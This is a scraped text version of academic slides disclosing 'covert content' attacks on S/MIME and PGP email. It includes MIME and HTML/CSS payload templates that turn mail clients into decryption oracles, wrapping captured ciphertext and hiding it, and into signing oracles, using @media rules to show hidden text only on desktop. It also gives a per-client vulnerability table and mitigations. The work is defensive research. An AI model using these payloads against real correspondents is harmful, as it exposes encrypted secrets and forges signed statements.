Upload
others
View
1
Download
0
Embed Size (px)
Citation preview
Re: What’s up Johnny?Covert Content Attacks on Email End -To-End Encryption
Jens Müller, Marcus Brinkmann, Damian Poddebniak,Sebastian Schinzel, Jörg Schwenk
Remember EFAIL?
2
• Last year: EFAIL
Remember EFAIL?
2
• Last year: EFAIL– Major attack with a logo
Remember EFAIL?
2
• Last year: EFAIL– Major attack with a logo
– Novel attack techniques
targeting S/MIME + PGP
Remember EFAIL?
2
• Last year: EFAIL– Major attack with a logo
– Novel attack techniques
targeting S/MIME + PGP
• Today: non-crypto attacks
Remember EFAIL?
2
• Last year: EFAIL– Major attack with a logo
– Novel attack techniques
targeting S/MIME + PGP
• Today: non-crypto attacks– Targeting encryption and digital signatures
Remember EFAIL?
2
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
3
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
3
Technology's promise
4
I. “Strong crypto is virtually unbreakable.”
Technology's promise
4
I. “Strong crypto is virtually unbreakable.”II. “Digital signature will prevail. Math wins.”
Technology's promise
4
I. “Strong crypto is virtually unbreakable.”II. “Digital signature will prevail. Math wins.”
Technology's promise
…claims I. and II. could be bypassed witha single reply to a benign looking email?
What if…
4
From: [email protected]: [email protected]: Important news
Some ASCII text message…
Traditional RFC822 email
5
From: [email protected]: [email protected]: Important news
Some ASCII text message…
Traditional RFC822 email
5
From: [email protected]: [email protected]: Important news
Some ASCII text message…
Traditional RFC822 email
5
From: [email protected]: [email protected]: Important news
-----BEGIN PGP MESSAGE-----…-----END PGP MESSAGE-----
Traditional PGP/Inline
6
From: [email protected]: [email protected]: Important news
-----BEGIN PGP MESSAGE-----…-----END PGP MESSAGE-----
Traditional PGP/Inline
6
From: [email protected]: [email protected]: Important news
-----BEGIN PGP MESSAGE-----…-----END PGP MESSAGE-----
Traditional PGP/Inline
6
Multipart MIME email
7
Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: [email protected]: [email protected]: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: [email protected]: [email protected]: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: [email protected]: [email protected]: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: [email protected]: [email protected]: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: [email protected]: [email protected]: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
multipart/mixed
7
Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: [email protected]: [email protected]: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
multipart/mixed
texttext
7
From: [email protected]: [email protected]: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/html
<b>HTML</b> message…
Content-type: application/pdf
%PDF-1.4 […]
Multipart MIME email
multipart/mixed
pdfhtml
7
From: [email protected]: [email protected]: Important newsContent-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
S/MIME
8
From: [email protected]: [email protected]: Important newsContent-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
S/MIME
8
From: [email protected]: [email protected]: Important newsContent-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
S/MIME
8
OpenPGP (RFC 4880)• Favored by privacy advocates• Web-of-trust (no authorities)
S/MIME (RFC 5751)• Favored by organizations• Multi-root trust-hierarchies
Two competing standards
9
OpenPGP (RFC 4880)• Favored by privacy advocates• Web-of-trust (no authorities)
S/MIME (RFC 5751)• Favored by organizations• Multi-root trust-hierarchies
Two competing standards
9
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
10
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
10
Attacker model
11
• Eve has captured ciphertext
Attacker model
11
• Eve has captured ciphertext• Can modify email structure
Attacker model
11
• Eve has captured ciphertext• Can modify email structure • Can re-send it to the victim
Attacker model
11
• Eve has captured ciphertext• Can modify email structure • Can re-send it to the victim
– Either to recipient or sender
Attacker model
11
• Eve has captured ciphertext• Can modify email structure • Can re-send it to the victim
– Either to recipient or sender– Both can decrypt the email
Attacker model
11
Covert content attack: Decryption oracle
12
Covert content attack: Decryption oracle
12
Covert content attack: Decryption oracle
12
Covert content attack: Decryption oracle
12
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
13
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
13
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
13
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
13
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
Content-type: text/plain
What's up Johnny?
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Decryption oracle
From: [email protected]
Content-Type: application/pkcs7-mime
MIAGCSqGSIb3DQEHA6CAMIACAQAxggHJMIIB…
Content-type: text/plain
What's up Johnny?
multipart/mixed
???text
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/plain
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/plain
What's up Johnny?
multipart/mixed
text secret
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/plain
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/plain
What's up Johnny?
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/plain
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/plain
What's up Johnny?
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/plain
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/plain
What's up Johnny?\n\n\n\n\n\n…
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/plain
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/plain
What's up Johnny?\n\n\n\n\n\n…
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/plain
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/html
What's up Johnny? <!--
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-type: text/plain
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/html
What's up Johnny? <!--
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-ID: <part2>
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/html
What's up Johnny? <img src="cid:part2">
13
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Content-Disposition: attachment
Secret message, for Johnny's eyes only…
Decryption oracle
From: [email protected]
Content-type: text/plain
What's up Johnny?
13
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
14
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
14
Covert content attack: Signing oracle
15
Covert content attack: Signing oracle
15
Covert content attack: Signing oracle
15
Covert content attack: Signing oracle
15
Covert content attack: Signing oracle
15
From: [email protected]: [email protected]: text/html
What's up Johnny?I hereby declare war.
Signature oracle
16
Signature oracle
From: [email protected]: [email protected]: text/html
What's up Johnny?<div class="covert"> I hereby declare war. </div>
16
Signature oracle
From: [email protected]: [email protected]: text/html
<style>IF condition:Hide * but show .covert
</style>What's up Johnny?<div class="covert">I hereby declare war.</div>
16
Signature oracle
From: [email protected]: [email protected]: text/html
<style>@media (max-device-width: 834px) {.covert {visibility: hidden;}}
</style>What's up Johnny?<div class="covert">I hereby declare war.</div>
hide covertcontent on mobile devices
16
Signature oracle
From: [email protected]: [email protected]: text/html
<style>@media (max-device-width: 834px) {.covert {visibility: hidden;}}
@media (min-device-width: 835px) {* {visibility: hidden;}.covert {visibility: visible}}
</style>What's up Johnny?<div class="covert">I hereby declare war.</div>
but show on desktop devices
16
I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:> What's up Johnny?
Re: What's up Johnny?
17
I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:> What's up Johnny?
Re: What's up Johnny?
Reply email sent from Johnny’s mobile phone
17
I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:> What's up Johnny?
Re: What's up Johnny?
Reply email sent from Johnny’s mobile phone
17
I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:> What's up Johnny?
Re: What's up Johnny?
I hereby declare war.
Signed email received on a desktop device
Reply email sent from Johnny’s mobile phone
17
Conditional rules
18
• Targeting device type (@media)
Conditional rules
18
• Targeting device type (@media)• Targeting email client (@supports)
Conditional rules
18
• Targeting device type (@media)• Targeting email client (@supports)• Targeting user account (@document)
Conditional rules
18
• Targeting device type (@media)• Targeting email client (@supports)• Targeting user account (@document)
Conditional rules
18
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
19
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
19
OS ClientDecryption Signatures
S/MIME PGP S/MIME PGP
Windows
ThunderbirdOutlookWin. 10 MailWin Live MailThe Bat!PostboxeM Client
Linux
KMailEvolutionTrojitáClawsMutt
macOSApple MailMailMateAirmail
iOS Mail App
Android
K-9 MailR2Mail2MailDroidNine
Web
Exchange/OWARoundcubeHorde/IMPMailpile
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
OS ClientDecryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ●Outlook ○Win. 10 Mail ○Win Live Mail ○The Bat! ○Postbox ●eM Client ○
Linux
KMail ◐Evolution ◐Trojitá ◐Claws ◐Mutt ◐
macOSApple Mail ●MailMate ●Airmail ●
iOS Mail App ●
Android
K-9 Mail –R2Mail2 ○MailDroid ○Nine ○
Web
Exchange/OWA ○Roundcube –Horde/IMP ○Mailpile –
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
OS ClientDecryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ●Outlook ○ ○Win. 10 Mail ○ –Win Live Mail ○ –The Bat! ○ ○Postbox ● ●eM Client ○ ○
Linux
KMail ◐ ◐Evolution ◐ ◐Trojitá ◐ ◐Claws ◐ ◐Mutt ◐ ◐
macOSApple Mail ● ●MailMate ● ●Airmail ● ●
iOS Mail App ● –
Android
K-9 Mail – ○R2Mail2 ○ ●MailDroid ○ ○Nine ○ –
Web
Exchange/OWA ○ –Roundcube – ◐Horde/IMP ○ ○Mailpile – ○
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
OS ClientDecryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ● ●Outlook ○ ○ ◐Win. 10 Mail ○ – ◐Win Live Mail ○ – ●The Bat! ○ ○ ○Postbox ● ● ●eM Client ○ ○ ◐
Linux
KMail ◐ ◐ ○Evolution ◐ ◐ ◐Trojitá ◐ ◐ ◐Claws ◐ ◐ ○Mutt ◐ ◐ ○
macOSApple Mail ● ● ◐MailMate ● ● ●Airmail ● ● ●
iOS Mail App ● – ●
Android
K-9 Mail – ○ –R2Mail2 ○ ● ◐MailDroid ○ ○ ●Nine ○ – ●
Web
Exchange/OWA ○ – ●Roundcube – ◐ ◐Horde/IMP ○ ○ ◐Mailpile – ○ –
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
OS ClientDecryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ● ● ●Outlook ○ ○ ◐ ◐Win. 10 Mail ○ – ◐ –Win Live Mail ○ – ● –The Bat! ○ ○ ○ ○Postbox ● ● ● ●eM Client ○ ○ ◐ ◐
Linux
KMail ◐ ◐ ○ ○Evolution ◐ ◐ ◐ ◐Trojitá ◐ ◐ ◐ ◐Claws ◐ ◐ ○ ○Mutt ◐ ◐ ○ ○
macOSApple Mail ● ● ◐ ◐MailMate ● ● ● ●Airmail ● ● ● ●
iOS Mail App ● – ● –
Android
K-9 Mail – ○ – ●R2Mail2 ○ ● ◐ ◐MailDroid ○ ○ ● ●Nine ○ – ● –
Web
Exchange/OWA ○ – ● –Roundcube – ◐ ◐ ◐Horde/IMP ○ ○ ◐ ◐Mailpile – ○ – ○
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
OS ClientDecryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ● ● ●Outlook ○ ○ ◐ ◐Win. 10 Mail ○ – ◐ –Win Live Mail ○ – ● –The Bat! ○ ○ ○ ○Postbox ● ● ● ●eM Client ○ ○ ◐ ◐
Linux
KMail ◐ ◐ ○ ○Evolution ◐ ◐ ◐ ◐Trojitá ◐ ◐ ◐ ◐Claws ◐ ◐ ○ ○Mutt ◐ ◐ ○ ○
macOSApple Mail ● ● ◐ ◐MailMate ● ● ● ●Airmail ● ● ● ●
iOS Mail App ● – ● –
Android
K-9 Mail – ○ – ●R2Mail2 ○ ● ◐ ◐MailDroid ○ ○ ● ●Nine ○ – ● –
Web
Exchange/OWA ○ – ● –Roundcube – ◐ ◐ ◐Horde/IMP ○ ○ ◐ ◐Mailpile – ○ – ○
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
21
1. Introduction2. Attacks on Encryption3. Attacks on Signatures4. Evaluation5. Mitigation
Overview
21
Decryption oracles
22
• Accepting ASCII text only
Decryption oracles
22
• Accepting ASCII text only
Decryption oracles
22
• Accepting ASCII text only• Enforcing digital signatures
Decryption oracles
22
• Accepting ASCII text only• Enforcing digital signatures
Decryption oracles
22
• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption
Decryption oracles
22
• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption
Decryption oracles
22
• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption• All-or-Nothing Encryption
Decryption oracles
22
• Accepting ASCII text only• Enforcing digital signatures• Warn on partial encryption• All-or-Nothing Encryption
Decryption oracles
Root causes: long-term keys +ciphertext usage out-of-context
22
Signing oracles
23
• Dropping CSS Support
Signing oracles
23
• Dropping CSS Support
Signing oracles
23
• Dropping CSS Support• Only ASCII Text in replies
Signing oracles
23
• Dropping CSS Support• Only ASCII Text in replies• Remove styles from replies
Signing oracles
23
Conclusion
24
• Crypto is not enough, bypasses exist
Conclusion
24
• Crypto is not enough, bypasses exist• 22 of 24 tested clients are vulnerable
Conclusion
24
• Crypto is not enough, bypasses exist• 22 of 24 tested clients are vulnerable• Building security on top of email is hard
Conclusion
24
• Crypto is not enough, bypasses exist• 22 of 24 tested clients are vulnerable• Building security on top of email is hard
Conclusion
Thank you! Questions?Exploits: github.com/RUB-NDS/Covert-Content-Attacks
24
HTML and CSS support in various email clients
Proprietary conditional features
Blinding options